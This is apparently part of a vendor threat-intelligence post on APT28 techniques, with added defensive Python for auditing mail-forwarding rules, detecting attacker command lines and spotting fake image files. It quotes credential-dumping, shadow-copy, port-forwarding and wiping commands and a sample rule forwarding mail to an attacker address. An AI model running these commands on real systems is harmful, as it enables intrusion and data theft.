BeardShell executed the SystemInfo command as its first action. It also combined the local computer name, domain name, username, workstation name, and a hardware profile GUID (via GetCurrentHwProfileW) to create a unique fingerprint hash using the FNV4 algorithm.
Other campaigns collected unique identifiers based on storage volume serial numbers.
T1083 File and Directory Discovery
To avoid re-infection or detection, VBA macros queried for the existence of specific files, such as %localappdata%/windows.png and %allusersprofile%/prnfldr.dll, terminating if they were found.
T1087.003 Account Discovery: Email Account
SpyPress malware enumerated details about compromised email accounts.
- Roundcube: Fetched the "about" page (_action=about) and the mailbox list via rcmail.env.mailboxes.
- Zimbra: Exfiltrated the ZmSetting global variable containing preferences and configuration.
Tactic: Collection
T1056.001 Input Capture: Keylogging
The SlimAgent tool acted as a keylogger, recording keystrokes and encoding special keys in unicode (e.g., [BKSP]). It specifically monitored for potential passwords by triggering screenshots when a buffer of more than 4 characters was followed by an "Enter" press.
T1074.002 Data Staged: Remote Data Staging
Archives of collected data were staged on the target's Outlook Web Access (OWA) server.
T1113 Screen Capture
Screen capture functionality was implemented by simulating a PrintScreen key press (virtual-key code VK_SNAPSHOT), which places the screenshot on the clipboard.
Covenant uploaded PNG screenshots of the desktop, while SlimAgent captured JPEG screenshots every 5 seconds.
T1114.002 Email Collection: Remote Email Collection
SpyPress malware systematically iterated through victim mailboxes to collect messages.
- MDaemon: Browsed folders and retrieved full email sources via specific URL requests (/WorldClient.dll?Session=...).
- Roundcube: Fetched email sources using _action=viewsource and uid, filtering for messages received after a hardcoded date.
- Zimbra: Iterated over the first 80 emails in each folder via SOAP requests.
T1114.003 Email Collection: Email Forwarding Rule
To maintain access to information, SpyPress.ROUNDCUBE created a malicious server-side Sieve rule. This rule forwarded a copy of every incoming email to an attacker-controlled address (e.g., srezoska@skiff[.]com), ensuring collection persisted even if the malicious script stopped running.
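A forwarding rule of this kind survives password resets and removal of the injected script, so it has to be checked on the server side. The Python below is an added example for this post (not ESET's or Picus's code). It audits Sieve script text, as returned by the ManageSieve GETSCRIPT command or read from the user's sieve directory, and lists every redirect action, whether it keeps a local copy (:copy, which is what makes the forward invisible to the victim), whether the target domain is outside the organisation, and the nearest preceding rule name in the # rule:[name] comment convention that Roundcube's managesieve plugin writes. The script is a constructed sample; the forwarding address is the one named above.

```python
import re

# redirect [:copy] [:list "..."] "address";   (tags are optional; only :copy matters here)
REDIRECT = re.compile(r'\bredirect\b((?:\s+:\w+(?:\s+"[^"]*")?)*)\s+"([^"]+)"\s*;', re.I)
RULE_NAME = re.compile(r"^\s*#\s*rule:\[(.*?)\]")


def audit_sieve(script: str, internal_domains) -> list:
    """Return one dict per redirect action: rule name, target, whether :copy is set,
    and whether the target domain is external to the organisation."""
    internal = {d.lower() for d in internal_domains}
    findings, rule = [], None
    for line in script.splitlines():
        m = RULE_NAME.match(line)
        if m:
            rule = m.group(1)
            continue
        for m in REDIRECT.finditer(line):
            tags, target = m.group(1).lower(), m.group(2)
            domain = target.rsplit("@", 1)[-1].lower()
            findings.append({"rule": rule, "target": target, "copy": ":copy" in tags,
                             "external": domain not in internal})
    return findings


def external_forwards(script: str, internal_domains) -> list:
    """Triage shortcut: only the redirects that leave the organisation."""
    return [f for f in audit_sieve(script, internal_domains) if f["external"]]


# Constructed sample, shaped like a Roundcube managesieve-plugin script.
SAMPLE_SIEVE = '''require ["fileinto","copy"];
# rule:[Invoices]
if header :contains "subject" "invoice"
{
    fileinto "Invoices";
}
# rule:[Forward copy]
if true
{
    redirect :copy "srezoska@skiff.com";
}
# rule:[Helpdesk]
if address :is "from" "alerts@victim.example"
{
    redirect "helpdesk@victim.example";
}
'''

if __name__ == "__main__":
    for f in audit_sieve(SAMPLE_SIEVE, ["victim.example"]):
        print(f)
```

Run this over every user's active script after a suspected RoundPress exposure, not only the accounts where the phishing mail was found, because the rule is created from inside the victim's session and leaves no trace in the mail client's own history.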
T1115 Clipboard Data
After triggering a screenshot key press, malware accessed the clipboard to retrieve the image data and convert it to JPG.
SlimAgent also monitored the clipboard, logging content between black-colored HTML tags to distinguish it from other data.
T1119 Automated Collection
SpyPress payloads implemented automated data harvesting routines. SpyPress.ROUNDCUBE initiated email exfiltration every 7,200 seconds (2 hours), while SpyPress.ZIMBRA used setInterval to trigger every 14,400 seconds (4 hours).
T1560.001 Archive Collected Data: Archive via Utility
Data collected from compromised systems, including ntds.dit and registry hives, was compressed into ZIP archives using PowerShell commands or the GUI version of WinRAR. WinRAR was also used to password-protect these archives.
Tactic: Command and Control
T1071.001 Application Layer Protocol: Web Protocols
Communication with C2 servers was conducted over HTTPS, with malware configured to ignore invalid server certificates using WinINet security flags such as SECURITY_FLAG_IGNORE_CERT_DATE_INVALID and SECURITY_FLAG_IGNORE_UNKNOWN_CA. Because the implant does not validate the certificate, its traffic can be terminated and inspected by a TLS-intercepting proxy without breaking the channel.
T1090.001 Proxy: Internal Proxy
To pivot from a Guest Wi-Fi network back into the corporate wired network, a series of port-forwards were established using netsh. This allowed access to segmented high-value systems.
    cmd.exe /C netsh advfirewall firewall add rule name="Remote Event Log Management SMB" dir=in action=allow protocol=tcp localport=12345 > C:\Windows\Temp\MSI28122Ac.LOG 2>&1
    cmd.exe /C netsh interface portproxy add v4tov4 listenaddress=172.33.xx.xx listenport=12345 connectaddress=172.20.xx.xx connectport=445 > C:\Windows\Temp\MSI2cBfA24.LOG 2>&1
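Nearly every command quoted in this post is a process-creation event with a distinctive command line: the reg save calls and the Compress-Archive line under Execution, the comsvcs MiniDump and vssadmin/shadow-copy steps under Credential Access, the cipher /W wipe under Defense Evasion, and the netsh firewall and portproxy pair above. The Python below is an added example for this post, not a Picus or Volexity artefact. It runs a small rule set over constructed process-creation records (JSON lines with Sysmon-style field names, which is an assumption about the log schema) and adds one correlation, a shadow copy created and then read for a hive or ntds.dit on the same host inside ten minutes, which is the sequence behind the NTDS dump. Addresses in the sample are documentation ranges and every record is made up.

```python
import json
import re
from datetime import datetime

# Each rule runs over the lower-cased command line of a process-creation record.
RULES = {
    "reg_save_hive": re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|security|system)\b"),
    "comsvcs_minidump": re.compile(r"\brundll32\b.*comsvcs(?:\.dll)?\s*,?\s*(?:minidump|#24)\b"),
    "vss_shadow_create": re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b"),
    "shadow_copy_hive_read": re.compile(r"harddiskvolumeshadowcopy\d+\\.*(?:\\config\\(?:system|sam|security)\b|ntds\.dit)"),
    "ntdsutil_ifm": re.compile(r"\bntdsutil\b.*\bifm\b"),
    "cipher_wipe_free_space": re.compile(r"\bcipher(?:\.exe)?\s+/w:"),
    "netsh_portproxy_add": re.compile(r"\bnetsh\s+interface\s+portproxy\s+add\b"),
    "netsh_fw_allow_inbound": re.compile(r"\bnetsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\bdir=in\b.*\baction=allow\b"),
    "archive_hive_dumps": re.compile(r"^(?=.*compress-archive)(?=.*\.save\b)"),
    "rundll32_userwritable_dll": re.compile(r'\brundll32(?:\.exe)?\s+"?c:\\(?:users\\[^\\]+\\appdata|programdata)\\.*\.dll'),
}


def load_events(text: str) -> list:
    """Parse JSON-lines process-creation records."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events) -> list:
    """Return (computer, rule, command_line) for every record matching at least one rule."""
    hits = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        low = cmd.lower()
        for name, pattern in RULES.items():
            if pattern.search(low):
                hits.append((ev["Computer"], name, cmd))
    return hits


def ntds_theft_chain(events, window_seconds=600) -> list:
    """Hosts where a shadow copy was created and a hive or ntds.dit was then read out of it."""
    created, flagged = {}, []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        host, low = ev["Computer"], ev.get("CommandLine", "").lower()
        when = datetime.fromisoformat(ev["UtcTime"])
        if RULES["vss_shadow_create"].search(low):
            created[host] = when
        elif RULES["shadow_copy_hive_read"].search(low) and host in created:
            if (when - created[host]).total_seconds() <= window_seconds and host not in flagged:
                flagged.append(host)
    return flagged


# Constructed process-creation records (JSON lines); none of these are real telemetry.
SAMPLE_LOG = r"""
{"UtcTime": "2025-03-02T10:15:00", "Computer": "FS01", "CommandLine": "cmd.exe /c servtask.bat"}
{"UtcTime": "2025-03-02T10:15:01", "Computer": "FS01", "CommandLine": "reg save hklm\\sam C:\\ProgramData\\sam.save"}
{"UtcTime": "2025-03-02T10:15:02", "Computer": "FS01", "CommandLine": "reg save hklm\\security C:\\ProgramData\\security.save"}
{"UtcTime": "2025-03-02T10:15:30", "Computer": "FS01", "CommandLine": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 712 C:\\ProgramData\\ls.dmp full"}
{"UtcTime": "2025-03-02T10:16:10", "Computer": "DC01", "CommandLine": "vssadmin create shadow /for=C: /quiet"}
{"UtcTime": "2025-03-02T10:16:40", "Computer": "DC01", "CommandLine": "cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\ntds.dit C:\\ProgramData\\ntds.dit"}
{"UtcTime": "2025-03-02T10:20:00", "Computer": "FS01", "CommandLine": "Powershell -c \"Get-ChildItem C:\\ProgramData\\sam.save, C:\\ProgramData\\security.save, C:\\ProgramData\\system.save | Compress-Archive -DestinationPath C:\\ProgramData\\out.zip\""}
{"UtcTime": "2025-03-02T11:00:00", "Computer": "WS07", "CommandLine": "cmd.exe /C netsh interface portproxy add v4tov4 listenaddress=192.0.2.15 listenport=12345 connectaddress=198.51.100.20 connectport=445"}
{"UtcTime": "2025-03-02T11:30:00", "Computer": "FS01", "CommandLine": "cmd.exe /c cipher /W:C"}
{"UtcTime": "2025-03-02T12:00:00", "Computer": "WS07", "CommandLine": "cmd.exe /c dir C:\\Users"}
"""

if __name__ == "__main__":
    evs = load_events(SAMPLE_LOG)
    for host, rule, cmd in detect(evs):
        print(f"{host:5s} {rule:26s} {cmd}")
    print("ntds theft chain on:", ntds_theft_chain(evs))
```

The command-line rules are cheap and will catch an operator who types the commands quoted in this post verbatim; an operator who renames reg.exe or calls the APIs directly will not trip them, so pair them with event sources that do not depend on the command line (LSASS access auditing for the MiniDump case, VSS provider events for the shadow-copy case, and the firewall's own rule-change audit for the netsh case).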
T1102.002 Web Service: Bidirectional Communication
Koofr and Icedrive were used as the C2 channel itself: implants polled attacker-registered storage accounts for tasks and uploaded results to them, so no attacker-owned server had to be contacted directly.
- Koofr (Covenant): Malware polled the Transfering folder for tasks and uploaded results to the Keeping folder.
- Icedrive (BeardShell): Malware created a directory named after the host's FNV4 hash and polled it every four hours for command files.
T1132.001 Data Encoding: Standard Encoding
SpyPress payloads encoded data sent to the C2 server in Base64. A specific string format was used for credentials, where px denoted password exfiltration.
    Encoded: bWVAdmljdGltLm9yZyA6OiBweAoKbXl1c2VybmFtZSBteXBhc3N3b3Jk
    Decoded (line feeds shown as \n): me@victim.org :: px\n\nmyusername mypassword
T1573.001 Encrypted Channel: Symmetric Cryptography
Files transferred to and from C2 storage were encrypted. BeardShell utilized the ChaCha20-Poly1305 algorithm with a 32-byte key, producing a 16-byte authentication tag. Headers and footers were added to masquerade the encrypted data as valid image types (GIF, PNG, JPEG).
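The GIF, PNG and JPEG headers and footers described above defeat magic-byte checks but not structural ones, because an encrypted blob does not contain the chunk, segment and block layout the format requires after its signature. The Python below is an added example for this post (not BeardShell code and not from the cited reports). It validates the container structure of the three formats far enough to tell a real image from a signature wrapped around ciphertext: PNG chunk framing with CRC-32 and an IEND chunk with nothing after it, JPEG marker-segment lengths up to the start of scan data, and the GIF header, colour table and first block introducer. The sample files are constructed; the minimal JPEG is a header skeleton, not a decodable picture.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def validate_png(data: bytes):
    """Walk the chunk list: IHDR first, CRC-32 over type+data for every chunk, IEND last with no trailer."""
    if not data.startswith(PNG_SIG):
        return False, "bad PNG signature"
    pos, first = len(PNG_SIG), True
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if first and ctype != b"IHDR":
            return False, "first chunk is not IHDR"
        first = False
        end = pos + 8 + length
        if end + 4 > len(data):
            return False, f"truncated chunk {ctype!r}"
        (crc,) = struct.unpack(">I", data[end:end + 4])
        if zlib.crc32(data[pos + 4:end]) & 0xFFFFFFFF != crc:
            return False, f"bad CRC in {ctype!r}"
        pos = end + 4
        if ctype == b"IEND":
            return (True, "ok") if pos == len(data) else (False, f"{len(data) - pos} trailing bytes after IEND")
    return False, "no IEND chunk"


def validate_jpeg(data: bytes):
    """Walk marker segments from SOI until SOS; every non-standalone marker carries a length."""
    if data[:2] != b"\xff\xd8":
        return False, "bad SOI"
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return False, f"expected marker at offset {pos}"
        marker = data[pos + 1]
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:      # standalone markers carry no length
            pos += 2
            continue
        if marker == 0xDA:                                       # SOS: entropy-coded data follows
            return True, "ok"
        if pos + 4 > len(data):
            return False, "truncated segment header"
        (seglen,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if seglen < 2 or pos + 2 + seglen > len(data):
            return False, f"bad segment length for marker 0x{marker:02x}"
        pos += 2 + seglen
    return False, "no SOS marker"


def validate_gif(data: bytes):
    """Check header, logical screen descriptor, optional global colour table and first block introducer."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        return False, "bad GIF signature"
    if len(data) < 13:
        return False, "truncated logical screen descriptor"
    flags, pos = data[10], 13
    if flags & 0x80:                                             # global colour table present
        pos += 3 * (2 << (flags & 0x07))
    if pos >= len(data):
        return False, "truncated colour table"
    if data[pos] not in (0x2C, 0x21, 0x3B):                      # image, extension or trailer
        return False, f"unexpected block introducer 0x{data[pos]:02x}"
    return True, "ok"


def classify(data: bytes):
    """(format, is_structurally_valid, reason) based on signature plus structure."""
    if data.startswith(PNG_SIG):
        return ("png",) + validate_png(data)
    if data[:2] == b"\xff\xd8":
        return ("jpeg",) + validate_jpeg(data)
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return ("gif",) + validate_gif(data)
    return ("unknown", False, "no known image signature")


# Constructed samples.
def _png_chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF)


def make_png() -> bytes:
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0)          # 1x1, 8-bit RGBA
    idat = zlib.compress(b"\x00" + b"\x00\x00\x00\xff")          # filter byte + one opaque black pixel
    return PNG_SIG + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"IDAT", idat) + _png_chunk(b"IEND", b"")


def make_jpeg_skeleton() -> bytes:
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"       # 14 bytes of APP0 payload
    return b"\xff\xd8" + b"\xff\xe0" + struct.pack(">H", 2 + len(app0)) + app0 + b"\xff\xda"


def make_gif() -> bytes:
    return b"GIF89a" + b"\x01\x00\x01\x00\x00\x00\x00" + b"\x2c" + bytes(9) + b"\x3b"


FAKE_BLOB = bytes(range(256))                                    # stands in for ChaCha20-Poly1305 output

if __name__ == "__main__":
    for label, sample in [("real png", make_png()), ("png+trailer", make_png() + FAKE_BLOB),
                          ("png sig only", PNG_SIG + FAKE_BLOB), ("jpeg skeleton", make_jpeg_skeleton()),
                          ("jpeg wrap", b"\xff\xd8" + FAKE_BLOB + b"\xff\xd9"),
                          ("gif", make_gif()), ("gif wrap", b"GIF89a" + FAKE_BLOB + b"\x3b")]:
        print(f"{label:14s} {classify(sample)}")
```

The JPEG check stops at the SOS marker, so an adversary who prepends a complete marker sequence and places the ciphertext where scan data belongs would pass it; closing that gap means fully decoding the file or measuring the entropy of the scan data. The PNG check has no such hole, because every chunk up to and including IEND is CRC-verified and a trailer after IEND is reported.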
Tactic: Exfiltration
T1041 Exfiltration Over C2 Channel
Collected system information, screenshots, email bodies, contacts, and credentials were transmitted directly to the C2 server via established HTTPS channels or HTTP POST requests.
T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
Collected data, including keylogs, screenshots, and command outputs, was exfiltrated by uploading files to designated containers on cloud storage services like Icedrive or Koofr. SlimAgent prepared encrypted logs in HTML format, named Desktop_<DD-MM-YYYY_HH-MM-SS>.svc, for this purpose.
How Does Picus Simulate APT28 Attacks?
We also strongly suggest simulating APT28 Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for APT28:
Threat ID | Threat Name | Attack Module
43803 | Sofacy Threat Group Campaign Malware Download Threat | Network Infiltration
76649 | Russian Gru Threat Group Campaign | Windows Endpoint
52129 | APT28 Threat Group Campaign Malware Email Threat - 3 | E-mail Infiltration
26499 | APT28 Threat Group Campaign Malware Download Threat - 3 | Network Infiltration
32102 | APT28 Threat Group Campaign | Windows Endpoint
69336 | APT28 Threat Group Campaign Backdoor Malware Download Threat | Network Infiltration
40970 | APT28 Threat Group Campaign Backdoor Malware Email Threat | Network Infiltration
55136 | APT28 Threat Group Campaign RAT Download Threat | Network Infiltration
87655 | APT28 Threat Group Campaign RAT Email Threat | Network Infiltration
96442 | APT28 Threat Group Campaign Malware Download Threat - 2 | Network Infiltration
51063 | APT28 Threat Group Campaign Malware Email Threat - 2 | Network Infiltration
20220 | APT28 Threat Group Campaign Malware Downloader Email Threat | Network Infiltration
43231 | APT28 Threat Group Campaign Malware Downloader Download Threat | Network Infiltration
59102 | APT28 Threat Group Campaign Malware Email Threat - 1 | Network Infiltration
86199 | APT28 Threat Group Campaign Malware Download Threat - 1 | Network Infiltration
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
What Are the Aliases of the APT28 Group?
APT28 is also known as: APT 28, APT-C-20, ATK5, Blue Athena, BlueDelta, FANCY BEAR, FROZENLAKE, Fancy Bear, Fighting Ursa, Forest Blizzard, G0007, Grey-Cloud, Grizzly Steppe, Group 74, Group-4127, GruesomeLarch, IRON TWILIGHT, ITG05, Pawn Storm, SIG40, SNAKEMACKEREL, STRONTIUM, Sednit, Sofacy, Swallowtail, T-APT-12, TA422, TG-4127, Tsar Team, TsarTeam, UAC-0028, Threat Group-4127, ATK 5, TAG-0700, UAC-0063, TAG-110.
Key Takeaways
- APT28 has maintained a persistent operational tempo since 2009, targeting political, military, and diplomatic entities globally through high-profile campaigns such as the 2016 DNC breaches and the 2025 deployment of LAMEHUG malware.
- The group demonstrates significant adaptability by combining proven tradecraft with novel techniques, including the "Nearest Neighbor" attack vector that compromises corporate Wi-Fi networks via adjacent buildings and the integration of Large Language Model capabilities for command generation.
- Initial access strategies frequently exploit vulnerabilities in public-facing webmail servers like Roundcube, MDaemon, and Zimbra, alongside spearphishing campaigns that utilize the Signal messaging platform to bypass Mark-of-the-Web security controls.
- APT28 leverages legitimate cloud storage services such as Icedrive and Koofr as its Command and Control (C2) channel, using attacker-registered accounts to host malware payloads, deliver tasks, and receive exfiltrated data.
- The group employs extensive defense evasion tactics, including the use of steganography to conceal shellcode within valid PNG files, DLL proxying to masquerade as legitimate system libraries, and the native Cipher.exe utility to securely wipe forensic artifacts.
- Credential access and collection focus on extracting data from the Active Directory database (ntds.dit), dumping LSASS memory, and deploying specialized JavaScript frameworks like SpyPress to capture browser inputs and harvest emails.
- Persistence and privilege escalation are achieved through sophisticated mechanisms such as COM hijacking, modification of logon scripts, and the use of the GooseEgg tool to exploit the CVE-2022-38028 vulnerability in the Windows Print Spooler service.
References
[1] “IRON TWILIGHT Supports Active Measures,” Secureworks. Accessed: Dec. 05, 2025. [Online]. Available: https://www.secureworks.com/research/iron-twilight-supports-active-measures
[2] “CrowdStrike’s work with the Democratic National Committee: Setting the record straight,” CrowdStrike.com. Accessed: Dec. 05, 2025. [Online]. Available: https://www.crowdstrike.com/en-us/blog/bears-midst-intrusion-democratic-national-committee/
[3] “U.S. Charges Russian GRU Officers with International Hacking and Related Influence and Disinformation Operations.” Accessed: Dec. 05, 2025. [Online]. Available: https://www.justice.gov/archives/opa/pr/us-charges-russian-gru-officers-international-hacking-and-related-influence-and
[4] B. Lee, M. Harbison, and R. Falcone, “Sofacy Attacks Multiple Government Entities,” Unit 42. Accessed: Dec. 04, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/unit42-sofacy-attacks-multiple-government-entities/
[5] T. Burt, “New cyberattacks targeting U.S. elections,” Microsoft On the Issues. Accessed: Dec. 05, 2025. [Online]. Available: https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/
[6] “The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access,” Volexity. Accessed: Dec. 04, 2025. [Online]. Available: https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/
[7] B. Leonard, “Ukraine remains Russia’s biggest cyber focus in 2023,” Google. Accessed: Dec. 05, 2025. [Online]. Available: https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/
[8] V. Simonovich, “Cato CTRL Threat Research: Analyzing LAMEHUG – First Known LLM-Powered Malware with Links to APT28 (Fancy Bear),” Cato Networks. Accessed: Dec. 05, 2025. [Online]. Available: https://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/
[9] Sekoia TDR, “APT28 Operation Phantom Net Voxel,” Sekoia.io Blog. Accessed: Dec. 04, 2025. [Online]. Available: https://blog.sekoia.io/apt28-operation-phantom-net-voxel
[10] M. Faou, “Operation RoundPress.” Accessed: Dec. 05, 2025. [Online]. Available: https://www.welivesecurity.com/en/eset-research/operation-roundpress/